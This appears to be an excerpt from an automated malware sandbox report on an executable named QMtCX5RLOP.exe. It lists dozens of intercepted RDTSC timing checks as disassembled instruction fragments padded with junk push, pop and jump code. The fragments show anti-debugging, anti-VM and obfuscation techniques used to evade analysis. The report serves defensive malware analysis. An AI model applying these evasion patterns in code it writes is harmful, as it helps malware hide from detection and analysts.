Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1638DBE second address: 1638DDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9D00F1DB66h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1638DDA second address: 1638DDF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1639209 second address: 163923B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F9D00F1DB68h 0x0000000b popad 0x0000000c jno 00007F9D00F1DB58h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007F9D00F1DB56h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 163923B second address: 163923F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 163923F second address: 1639247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1639247 second address: 1639253 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9D01181AAEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1639253 second address: 163925D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 163925D second address: 1639261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 164160E second address: 1641621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jp 00007F9D00F1DB7Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1641621 second address: 1641625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1641794 second address: 164179E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9D00F1DB56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1642003 second address: 1642008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1642008 second address: 164200E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 164200E second address: 1642014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16426EA second address: 16426F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9D00F1DB5Eh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16426F8 second address: 16426FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16426FC second address: 1642705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1640DA9 second address: 1640DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1640DAE second address: 1640DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 164A077 second address: 164A07B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16502E3 second address: 16502E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16502E7 second address: 165032B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jno 00007F9D01181AA6h 0x0000000d jmp 00007F9D01181AB8h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F9D01181AA6h 0x0000001b jmp 00007F9D01181AB6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 165032B second address: 165032F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 165032F second address: 1650364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D01181AABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jc 00007F9D01181AE3h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F9D01181AB1h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1652AF5 second address: 1652B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F9D00F1DB66h 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F9D00F1DB56h 0x00000012 jp 00007F9D00F1DB56h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1652955 second address: 1652965 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1652965 second address: 165296A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 165296A second address: 1652970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 165B587 second address: 165B5B2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9D00F1DB6Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 165B5B2 second address: 165B5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 165B5B6 second address: 165B5C0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9D00F1DB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 165B5C0 second address: 165B5CE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9D01181AA8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 165B5CE second address: 165B5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 165B144 second address: 165B168 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9D01181AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D01181AB8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 165ECDD second address: 165ED0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9D00F1DB62h 0x0000000d ja 00007F9D00F1DB66h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 165ED0D second address: 165ED18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F9D01181AA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 165ED18 second address: 165ED1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1663BE6 second address: 1663BF8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F9D01181AB2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1663BF8 second address: 1663BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1663BFE second address: 1663C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1667AB2 second address: 1667AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 166C6E9 second address: 166C6F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 166F1C1 second address: 166F1C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16776C7 second address: 16776CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1675FBD second address: 1675FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1675FC1 second address: 1675FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 167635A second address: 1676360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16764ED second address: 16764F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16764F1 second address: 16764F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16764F7 second address: 1676513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D01181AB2h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1676513 second address: 167652F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 167652F second address: 1676533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1676672 second address: 167667F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F9D00F1DB56h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1676800 second address: 1676830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D01181AB3h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D01181AB4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1676830 second address: 1676834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 1678EB4 second address: 1678ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F9D01181AAFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 167BDBC second address: 167BDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F9D00F1DB62h 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16BFA63 second address: 16BFA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16BFA69 second address: 16BFA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 16BFA6D second address: 16BFA77 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9D01181AA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179AF7B second address: 179AF8D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007F9D00F1DB56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179AF8D second address: 179AF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179AF93 second address: 179AF97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179A60B second address: 179A612 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179A783 second address: 179A78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179AA5B second address: 179AA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9D01181AA6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179AA69 second address: 179AA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9D00F1DB64h 0x0000000b popad 0x0000000c ja 00007F9D00F1DB62h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179AA8C second address: 179AA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179ABED second address: 179ABF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179ABF2 second address: 179ABF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179ABF7 second address: 179AC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnp 00007F9D00F1DB56h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9D00F1DB60h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a jmp 00007F9D00F1DB63h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179AC2F second address: 179AC35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179AC35 second address: 179AC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179AC3B second address: 179AC56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9D01181AB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179C7BA second address: 179C7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe RDTSC instruction interceptor: First address: 179C7C0 second address: 179C7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179C7C4 second address: 179C7E5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9D00F1DB56h 0x00000008 jng 00007F9D00F1DB56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F9D00F1DB5Ch 0x00000016 jnp 00007F9D00F1DB56h 0x0000001c popad 0x0000001d push edi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179F0AC second address: 179F0B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179F5BF second address: 179F681 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9D00F1DB67h 0x00000008 jmp 00007F9D00F1DB61h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 pushad 0x00000011 jg 00007F9D00F1DB5Bh 0x00000017 and ax, 24F1h 0x0000001c add dword ptr [ebp+122D19DEh], edi 0x00000022 popad 0x00000023 mov dword ptr [ebp+122D2588h], ecx 0x00000029 push dword ptr [ebp+122D362Ch] 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F9D00F1DB58h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 call 00007F9D00F1DB67h 0x0000004e pop edx 0x0000004f call 00007F9D00F1DB59h 0x00000054 jbe 00007F9D00F1DB60h 0x0000005a pushad 0x0000005b push ebx 0x0000005c pop ebx 0x0000005d jc 00007F9D00F1DB56h 0x00000063 popad 0x00000064 push eax 0x00000065 push ecx 0x00000066 push esi 0x00000067 jmp 00007F9D00F1DB5Ch 0x0000006c pop esi 0x0000006d pop ecx 0x0000006e mov eax, dword ptr [esp+04h] 0x00000072 js 00007F9D00F1DB63h 0x00000078 jmp 00007F9D00F1DB5Dh 0x0000007d mov eax, dword ptr [eax] 0x0000007f je 00007F9D00F1DB60h 0x00000085 push eax 0x00000086 push edx 0x00000087 pushad 0x00000088 popad 0x00000089 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 17A1028 second address: 17A1047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9D01181AA6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F9D01181AAFh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 17A2C48 second address: 17A2C52 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9D00F1DB62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 17A2C52 second address: 17A2C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6000A second address: 6E60010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60010 second address: 6E60014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60014 second address: 6E60025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a movzx eax, bx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60025 second address: 6E6005B instructions: 0x00000000 rdtsc 0x00000002 mov di, 994Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F9D01181AB2h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9D01181AB7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6005B second address: 6E60061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60061 second address: 6E600B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F9D01181AB7h 0x0000000f mov eax, dword ptr fs:[00000030h] 0x00000015 jmp 00007F9D01181AB6h 0x0000001a sub esp, 18h 0x0000001d pushad 0x0000001e mov ecx, 183FB4EDh 0x00000023 mov bl, al 0x00000025 popad 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov esi, edx 0x0000002c mov ebx, 6D387C1Eh 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E600B6 second address: 6E600D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f movzx esi, dx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E600D7 second address: 6E60109 instructions: 0x00000000 rdtsc 0x00000002 mov ax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov cx, di 0x0000000a popad 0x0000000b mov ebx, dword ptr [eax+10h] 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 mov edx, 51AD6B5Ch 0x00000017 popad 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9D01181AB7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60109 second address: 6E60158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9D00F1DB5Ch 0x00000013 sbb si, 1608h 0x00000018 jmp 00007F9D00F1DB5Bh 0x0000001d popfd 0x0000001e mov ch, 74h 0x00000020 popad 0x00000021 mov esi, dword ptr [74E806ECh] 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov ax, D549h 0x0000002e rdtsc
